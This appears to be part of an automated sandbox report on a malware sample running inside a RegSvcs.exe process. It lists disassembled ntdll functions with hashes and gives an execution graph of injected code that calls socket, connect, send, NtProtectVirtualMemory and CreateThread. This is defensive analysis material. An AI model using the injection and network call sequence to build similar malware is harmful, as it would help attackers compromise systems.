                                            • Opcode Fuzzy Hash: 9bbd9c4a3f62d3df78fdebd87c6b93aa49512bdde0df3928f965ff159e1286a4
                                            • Instruction Fuzzy Hash: 5190022160540406D14071585858746001997D1301F55E011A1029564DC6598B5D6BA2
                                            Function 018A2CF0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6edc828046d245c74260a2e894110b849d6722b5f9814f93803f5b7b5259e23
                                            • Instruction ID: e08f8192d0cc025d4160cc1bb88e1ad293b0262042509f625c6a90ee9c93c015
                                            • Opcode Fuzzy Hash: e6edc828046d245c74260a2e894110b849d6722b5f9814f93803f5b7b5259e23
                                            • Instruction Fuzzy Hash: 7390023120140407D10071585948747000997D1301F55E411A1429568DD6568A596622
                                            Function 018A2C60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d3cb131ce94196ebdde521af7751f96e2cbdf146343e86c131ca9eab6f74ba9
                                            • Instruction ID: ccb542d19543b9539815910c64c726e0c062bfa139b515ca94d0e3ad06261f95
                                            • Opcode Fuzzy Hash: 1d3cb131ce94196ebdde521af7751f96e2cbdf146343e86c131ca9eab6f74ba9
                                            • Instruction Fuzzy Hash: FB90023120140846D10071584844B86000997E1301F55D016A1129664DC615CA597A22
                                            Function 018A2FA0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5ffa019f54ecbdedff10d10462c77645ac18c64aceda526f232be144720680f4
                                            • Instruction ID: ec35fdfdf13059428983a89dccce95521baf327f256994fc6683dc8f3f6f1f53
                                            • Opcode Fuzzy Hash: 5ffa019f54ecbdedff10d10462c77645ac18c64aceda526f232be144720680f4
                                            • Instruction Fuzzy Hash: FD90023120180406D10071584C48787000997D1302F55D011A6169565EC665CA996A32
                                            Function 018A2F60 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8859ecd6c9073f731bc50e783a4da1f94c6c8f391b168ae20e4ba4c69c000c2e
                                            • Instruction ID: dc24e854d8b23fb14759b99b0679a4e045222eca798760ee8ce835b66d7c05a0
                                            • Opcode Fuzzy Hash: 8859ecd6c9073f731bc50e783a4da1f94c6c8f391b168ae20e4ba4c69c000c2e
                                            • Instruction Fuzzy Hash: 0790026121140046D10471584844746004997E2301F55D012A3159564CC5298E695626
                                            Function 018A2EE0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3191241866ac120e660f0de327e85fc0a5dc809144be56c0262339c80a003608
                                            • Instruction ID: 5ba4826f5fd05252a55340d57cb3ad81fc43c2b0939edf4f9a30575b98242613
                                            • Opcode Fuzzy Hash: 3191241866ac120e660f0de327e85fc0a5dc809144be56c0262339c80a003608
                                            • Instruction Fuzzy Hash: 7290026120180407D14075584C44647000997D1302F55D011A3069565ECA298E596636
                                            Function 018A2E30 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a75e5224ba9c146593dc3a6e2f690f6c9d60b4c6373b1dce5d57aca229deffd7
                                            • Instruction ID: 5d9c7b8bf1bef92e38af7e0338cf9d089849895ea98d29e7f2c854eb05e64963
                                            • Opcode Fuzzy Hash: a75e5224ba9c146593dc3a6e2f690f6c9d60b4c6373b1dce5d57aca229deffd7
                                            • Instruction Fuzzy Hash: 2F90022130140406D10271584854646000DD7D2345F95D012E2429565DC6258B5BA633
                                            Function 018A3090 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3bb817cd96746a3126095dfab62f59c494724ba4a229dc059ecc3d5945485abf
                                            • Instruction ID: 2e18b69970a9b80ff06336e79b669f291bf21ed2385868fdd946923bd503c9aa
                                            • Opcode Fuzzy Hash: 3bb817cd96746a3126095dfab62f59c494724ba4a229dc059ecc3d5945485abf
                                            • Instruction Fuzzy Hash: 8E90022124140806D14071588854747000AD7D1701F55D011A1029564DC6168B6D6BB2
                                            Function 018A3010 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c122689344fd0ebc2a56d8477b72818b2a52bfe4a83ee9a715e515465ee96d4
                                            • Instruction ID: 43120a35a0552f68918f9c1dd2b7ce62025e8bd8655cbc71e4f82d29dc80b8b2
                                            • Opcode Fuzzy Hash: 5c122689344fd0ebc2a56d8477b72818b2a52bfe4a83ee9a715e515465ee96d4
                                            • Instruction Fuzzy Hash: F690022120184446D14072584C44B4F410997E2302F95D019A515B564CC9158A5D5B22
                                            Function 018A35C0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 809a2e628f88572af1226956f202b1efcaa5c2d9b4f759fe49f19a96f65bfdfa
                                            • Instruction ID: 524aa147dd48ff081a0707201e509533c43b346d61abf177f1a5ea88d7d72532
                                            • Opcode Fuzzy Hash: 809a2e628f88572af1226956f202b1efcaa5c2d9b4f759fe49f19a96f65bfdfa
                                            • Instruction Fuzzy Hash: 8690023160550406D10071584954746100997D1301F65D411A1429578DC7958B596AA3
                                            Function 018A39B0 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d20969f2f34960f8fa1c76623e348aee613b52686794904b3fb0d6d285841fc1
                                            • Instruction ID: 03fb01c8d083812bdd08ced3b476842ff8550d0684e31d92c961884c174d83ad
                                            • Opcode Fuzzy Hash: d20969f2f34960f8fa1c76623e348aee613b52686794904b3fb0d6d285841fc1
                                            • Instruction Fuzzy Hash: 3290022124545106D150715C48446564009B7E1301F55D021A18195A4DC5558A5D6722
                                            Function 018A3D10 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b37f364ca163028ba253ab1d22f038758803670b358deb205e62f1d62352a661
                                            • Instruction ID: 3a8e21d84fdf1755b4dec124c85d9216e3c16341bd75099d64a15e78b608c61b
                                            • Opcode Fuzzy Hash: b37f364ca163028ba253ab1d22f038758803670b358deb205e62f1d62352a661
                                            • Instruction Fuzzy Hash: 5390023120240146954072585C44A8E410997E2302B95E415A101A564CC9148A695722
                                            Function 018A3D70 Relevance: .0, Instructions: 4COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5cc6a4510069606777bcf91a2d633b1669fd70434116aa00c35ac2bce67951ab
                                            • Instruction ID: 1ce540b83ec17c33dd2d196772abd6e623911758becf7e635d104e992c14fad8
                                            • Opcode Fuzzy Hash: 5cc6a4510069606777bcf91a2d633b1669fd70434116aa00c35ac2bce67951ab
                                            • Instruction Fuzzy Hash: 5F90023520140406D51071585C44686004A97D1301F55E411A1429568DC6548AA9A622
                                            Function 018A2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction ID: 495660c6c6ebb40cda5277ddaf59ab26478b30a0221369676ecf7f655a56e0dd
                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                            • Instruction Fuzzy Hash:
                                            Function 018A2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 4a32caf65a3db453b981b226abc97aea5978002fcff4fb4f17607b8c7e2b913d
                                            • Instruction ID: 405ee2b63be1e87b99eaef81be36d9ad88f1dac0735e08896355a61e03d99192
                                            • Opcode Fuzzy Hash: 4a32caf65a3db453b981b226abc97aea5978002fcff4fb4f17607b8c7e2b913d
                                            • Instruction Fuzzy Hash: E851F9B2A0021ABFDB25DB9C89D097EFBB9BB48740B948229F495D7641D334DF0087E0
                                            Function 01912410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 59e87a61eb011a6e1281cd7d3359bc124b418f3f77e41ab29b1dd28dbb22841a
                                            • Instruction ID: 85f3fb51820a1b5a50e0cc5f3b2a7220a4ebc6063d379fe2a95485a3a8fa7039
                                            • Opcode Fuzzy Hash: 59e87a61eb011a6e1281cd7d3359bc124b418f3f77e41ab29b1dd28dbb22841a
                                            • Instruction Fuzzy Hash: 97512A71A006496ECB30EF5CC9D087FB7FCEB44301B648869F59AD7685E674DA808760
                                            Function 01897630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 018D4742
                                            • ExecuteOptions, xrefs: 018D46A0
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018D46FC
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 018D4655
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 018D4787
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 018D4725
                                            • Execute=1, xrefs: 018D4713
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: e574790721ea0dbc361ba05222f98e1319ad9ffc8d9ff3a8e79e129f4d1ec3dd
                                            • Instruction ID: 672e325399dc7e4e60828f12a082a32e844e3b8c2cf5da90e6cdca7e4f7c3457
                                            • Opcode Fuzzy Hash: e574790721ea0dbc361ba05222f98e1319ad9ffc8d9ff3a8e79e129f4d1ec3dd
                                            • Instruction Fuzzy Hash: 3251093165021D7BEF21AFA8DC89FAD77A8AF55304F0800A9D605EB181EB70AB45CF95
                                            Function 01936940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction ID: 1721bffa8efdf50dd4375f19d2e5350467a27ee6312f35f41590b77e5e074cc3
                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction Fuzzy Hash: 78021671508342AFD319CF18C494A6BBBF9EFC8700F54892DFA998B254DB31EA05CB52
                                            Function 018AB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: 3b5e5b8a5e5c4832d1f5056523aa9ef1fc3ed7699cd2bc86bae7de93d48bcdca
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: CD81AF70E052499FFF298E6CC8917FEBFB1AF45360F984219D861E7291C7749A40CB51
                                            Function 019120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$[$]:%u
                                            • API String ID: 48624451-2819853543
                                            • Opcode ID: b857b117e89db5b7dc6a2dd863d5ab5e285adf1dcf5d46506b0794b26016388a
                                            • Instruction ID: ad5e58f75c554b30c5e7a9618ea15bd7f6ff8762533bc1d7881886703d0900a9
                                            • Opcode Fuzzy Hash: b857b117e89db5b7dc6a2dd863d5ab5e285adf1dcf5d46506b0794b26016388a
                                            • Instruction Fuzzy Hash: 3F214F7AA0011DABDB11EF69C840AEEBBFDEF54754F580126E909E3204E730DA418BA1
                                            Function 0188F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 018D031E
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018D02E7
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018D02BD
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 3aea30c28acdaaa878c568356c621fe7c82970f05415f022188b928b6445fc89
                                            • Instruction ID: 3b45dea7df11fddf30f3819c062f054df513c34675e45dda47f8d9c59d0cc6e6
                                            • Opcode Fuzzy Hash: 3aea30c28acdaaa878c568356c621fe7c82970f05415f022188b928b6445fc89
                                            • Instruction Fuzzy Hash: E5E18C306087429FE725EF2CC884B2ABBE0BB85318F140A5DF6A5CB2D1D774DA45CB52
                                            Function 0189BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 018D7BAC
                                            • RTL: Resource at %p, xrefs: 018D7B8E
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 018D7B7F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: cf74e81820845e573b8a1d2074f7d1feced16db1120b2f08a8066888cd67b14d
                                            • Instruction ID: 414991d08dccdf6cbbcd1bdd8a0a42e348d372938281198ce2f5ddb56376c209
                                            • Opcode Fuzzy Hash: cf74e81820845e573b8a1d2074f7d1feced16db1120b2f08a8066888cd67b14d
                                            • Instruction Fuzzy Hash: 924104313007069FDB20DE29D840F6AB7E5EF89714F140A1DFA5ADB780DB71EA058B91
                                            Function 0189B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018D728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 018D72C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 018D7294
                                            • RTL: Resource at %p, xrefs: 018D72A3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: be0e6ca860be2148885babd6cf124c434543861580e76c2b1cee43e286543ad9
                                            • Instruction ID: 57be1ebb26e989b460472533eee0e708e4eb18a5e7b9830f888afb4b745bf629
                                            • Opcode Fuzzy Hash: be0e6ca860be2148885babd6cf124c434543861580e76c2b1cee43e286543ad9
                                            • Instruction Fuzzy Hash: B5411131700346ABDB21DE29CC81F6AB7A5FF95718F140619FA56EB240DB31FA428BD1
                                            Function 01912300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: c4bb41950e83d5ef92e719e0ba6fa357ff93f6320842bf954dc9e15d0cb5587e
                                            • Instruction ID: 57d9816d619ef909ceb83edff5f3d2c2647594135042fae8198bdd361d9d11c3
                                            • Opcode Fuzzy Hash: c4bb41950e83d5ef92e719e0ba6fa357ff93f6320842bf954dc9e15d0cb5587e
                                            • Instruction Fuzzy Hash: 44317372A002199FDB20DF2DCC40BEEB7B8EB54751F940555E949E3244EB30AA458BA1
                                            Function 018A7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: d3f2071d455bc2b0fa9422c931d90c9982220fcece1d1d376b2a8de536508cbb
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 5391C571E0020A9BFF24DF6DC8806BEBBB5AF44720F94451AEA55E72C4E7728B409761
                                            Function 01869126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 36f474deb1c9c282b4d2f9cd221f0a94258abc5044f7f57fbfe66fc818f720c4
                                            • Instruction ID: 52043a69ad0d5edee13e60bd6cc29fda7bf025da813aa1335014c7a95a6ec065
                                            • Opcode Fuzzy Hash: 36f474deb1c9c282b4d2f9cd221f0a94258abc5044f7f57fbfe66fc818f720c4
                                            • Instruction Fuzzy Hash: 67810B71D00269DBDB25DB58CC44BEAB7B8AB48714F0041DAEA19F7280D7309F85CF61
                                            Function 018ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                            Download Yara Rule
                                            APIs
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 018ECFBD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: CallFilterFunc@8
                                            • String ID: @$@4Cw@4Cw
                                            • API String ID: 4062629308-3101775584
                                            • Opcode ID: 931399416f48912549ea00024453760fa6a4e56add185580874ec6276ccd91d5
                                            • Instruction ID: 2507c04d562dcbdda05d1fb84761473ab54084bd2f2e30c60206b8345d6c1035
                                            • Opcode Fuzzy Hash: 931399416f48912549ea00024453760fa6a4e56add185580874ec6276ccd91d5
                                            • Instruction Fuzzy Hash: DD41AE71900219DFDB21DFA9C844AAEBBF8FF95B40F04412AE905EB254E770DA05CB62

                                            Execution Graph

                                            Execution Coverage:1.2%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:11.4%
                                            Total number of Nodes:79
                                            Total number of Limit Nodes:9
                                            execution_graph 26951 1046f8c2 26952 1046f934 26951->26952 26953 1046f9a6 26952->26953 26954 1046f995 ObtainUserAgentString 26952->26954 26954->26953 26955 10474f82 26956 10474fb8 26955->26956 26957 10475022 26956->26957 26960 10475081 26956->26960 26967 104715b2 26956->26967 26959 10475134 26959->26957 26966 104751b2 26959->26966 26970 10471732 26959->26970 26960->26957 26960->26959 26962 10475117 getaddrinfo 26960->26962 26962->26959 26964 104757f4 setsockopt recv 26964->26957 26965 10475729 26965->26957 26965->26964 26966->26957 26973 104716b2 26966->26973 26968 104715ec 26967->26968 26969 1047160a socket 26967->26969 26968->26969 26969->26960 26971 10471788 connect 26970->26971 26972 1047176a 26970->26972 26971->26966 26972->26971 26974 104716e7 26973->26974 26975 10471705 send 26973->26975 26974->26975 26975->26965 26976 10475e12 26977 10475e45 NtProtectVirtualMemory 26976->26977 26980 10474942 26976->26980 26979 10475e70 26977->26979 26981 10474967 26980->26981 26981->26977 26982 10474232 26983 1047425c 26982->26983 26985 10474334 26982->26985 26984 10474410 NtCreateFile 26983->26984 26983->26985 26984->26985 26986 104692dd 26989 1046931a 26986->26989 26987 104693fa 26988 10469328 SleepEx 26988->26988 26988->26989 26989->26987 26989->26988 26993 10473f12 7 API calls 26989->26993 26994 1046a432 NtCreateFile 26989->26994 26995 104690f2 6 API calls 26989->26995 26993->26989 26994->26989 26995->26989 26996 10475bac 26998 10475bb1 26996->26998 26997 10475bb6 26998->26997 27031 1046bb72 26998->27031 27000 10475c2c 27000->26997 27001 10475c85 27000->27001 27003 10475c54 27000->27003 27004 10475c69 27000->27004 27045 10473ab2 NtProtectVirtualMemory 27001->27045 27041 10473ab2 NtProtectVirtualMemory 27003->27041 27007 10475c80 27004->27007 27008 10475c6e 27004->27008 27005 10475c8d 27046 1046d102 ObtainUserAgentString NtProtectVirtualMemory 27005->27046 27007->27001 27009 10475c97 27007->27009 27043 10473ab2 NtProtectVirtualMemory 27008->27043 27013 10475cbe 27009->27013 27014 10475c9c 27009->27014 27011 10475c5c 27042 1046cee2 ObtainUserAgentString NtProtectVirtualMemory 27011->27042 27013->26997 27018 10475cc7 27013->27018 27019 10475cd9 27013->27019 27035 10473ab2 NtProtectVirtualMemory 27014->27035 27016 10475c76 27044 1046cfc2 ObtainUserAgentString NtProtectVirtualMemory 27016->27044 27047 10473ab2 NtProtectVirtualMemory 27018->27047 27019->26997 27049 10473ab2 NtProtectVirtualMemory 27019->27049 27022 10475ccf 27048 1046d2f2 ObtainUserAgentString NtProtectVirtualMemory 27022->27048 27024 10475cac 27036 1046cde2 ObtainUserAgentString 27024->27036 27026 10475ce5 27050 1046d712 ObtainUserAgentString NtProtectVirtualMemory 27026->27050 27029 10475cb4 27037 10469412 27029->27037 27033 1046bb93 27031->27033 27032 1046bcce 27032->27000 27033->27032 27034 1046bcb5 CreateMutexW 27033->27034 27034->27032 27035->27024 27036->27029 27039 10469440 27037->27039 27038 10469473 27038->26997 27039->27038 27040 1046944d CreateThread 27039->27040 27040->26997 27041->27011 